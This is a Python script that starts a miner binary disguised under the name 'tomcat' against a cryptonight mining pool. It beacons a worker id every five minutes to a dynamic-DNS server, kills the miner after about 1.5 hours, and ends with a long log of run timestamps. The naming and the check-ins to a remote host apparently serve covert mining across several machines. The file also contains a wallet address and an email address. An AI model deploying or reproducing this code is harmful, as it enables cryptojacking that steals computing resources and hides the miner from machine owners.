import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:25:07.284795
#2018-02-17 17:13:04.386367
#2018-02-17 19:01:06.414663
#2018-02-17 20:49:03.979902
#2018-02-17 22:35:08.897590
#2018-02-18 00:19:06.569617
#2018-02-18 02:10:06.502954
#2018-02-18 03:58:01.535958
#2018-02-18 05:48:06.562423
#2018-02-18 07:38:07.154968
#2018-02-18 09:25:07.124843
#2018-02-18 11:12:05.798544
#2018-02-18 12:59:03.670157
#2018-02-18 14:46:04.923700
#2018-02-18 16:35:04.178955
#2018-02-18 18:24:01.444567
#2018-02-18 20:11:04.005953
#2018-02-18 21:57:06.236636
#2018-02-18 23:46:03.748588
#2018-02-19 01:32:07.033035
#2018-02-19 03:20:06.494621
#2018-02-19 05:05:05.129715
#2018-02-19 06:51:03.695161
#2018-02-19 08:39:06.923060
#2018-02-19 10:28:01.479711
#2018-02-19 12:16:05.036438
#2018-02-19 14:04:07.893496
#2018-02-19 15:52:08.316612
#2018-02-19 17:40:08.439596
#2018-02-19 19:28:07.122618
#2018-02-19 21:18:05.627059
#2018-02-19 23:04:04.753702
#2018-02-20 00:48:04.417002
#2018-02-20 02:38:06.434703
#2018-02-20 04:27:01.627335
#2018-02-20 06:11:06.252322
#2018-02-20 07:56:06.097038
#2018-02-20 09:42:04.941501
#2018-02-20 11:26:01.590098
#2018-02-20 13:12:05.923591
#2018-02-20 14:57:04.343116
#2018-02-20 16:43:01.528551
#2018-02-20 18:31:10.620844
#2018-02-20 20:22:04.693668
#2018-02-20 22:08:05.898355
#2018-02-20 23:50:06.123272
#2018-02-21 01:37:04.234058
#2018-02-21 03:25:06.359294
#2018-02-21 05:12:05.533914
#2018-02-21 06:59:03.536342
#2018-02-21 08:45:10.591343
#2018-02-21 10:31:09.075584
#2018-02-21 12:18:10.090882
#2018-02-21 14:06:04.216345
#2018-02-21 15:52:06.734396
#2018-02-21 17:43:11.949485
#2018-02-21 19:28:08.184026
#2018-02-21 21:18:03.943301
#2018-02-21 23:06:03.830365
#2018-02-22 00:54:04.136273
#2018-02-22 02:42:01.740582
#2018-02-22 04:28:06.160931
#2018-02-22 06:13:07.060599
#2018-02-22 07:57:07.718068
#2018-02-22 09:47:08.478316
#2018-02-22 11:32:10.645151
#2018-02-22 13:18:06.793802
#2018-02-22 15:06:04.263527
#2018-02-22 16:49:13.781712
#2018-02-22 18:39:06.844414
#2018-02-22 20:32:06.326717
#2018-02-22 22:17:07.186656
#2018-02-23 00:04:07.096787
#2018-02-23 01:52:07.995975
#2018-02-23 03:40:07.340019
#2018-02-23 05:24:07.822000
#2018-02-23 07:10:07.134792
#2018-02-23 09:14:08.352350
#2018-02-23 11:21:11.002898
#2018-02-23 13:12:04.126260
#2018-02-23 14:56:07.878205
#2018-02-23 16:46:08.067885
#2018-02-23 18:39:04.060564
#2018-02-23 20:25:07.097208
#2018-02-23 22:12:06.542627
#2018-02-23 23:59:07.411432
#2018-02-24 01:50:09.493880
#2018-02-24 03:43:05.011926
#2018-02-24 05:32:02.257528
#2018-02-24 07:18:06.537563
#2018-02-24 09:08:05.246965
#2018-02-24 10:42:05.195946
#2018-02-24 12:28:04.809514
#2018-02-24 14:01:04.688562
#2018-02-24 15:39:06.215983
#2018-02-24 17:19:03.642916
#2018-02-24 18:52:06.247320
#2018-02-24 20:24:03.449666
#2018-02-24 21:55:08.847308
#2018-02-25 02:23:07.104866
#2018-02-25 05:39:05.444620
#2018-02-25 11:35:03.893603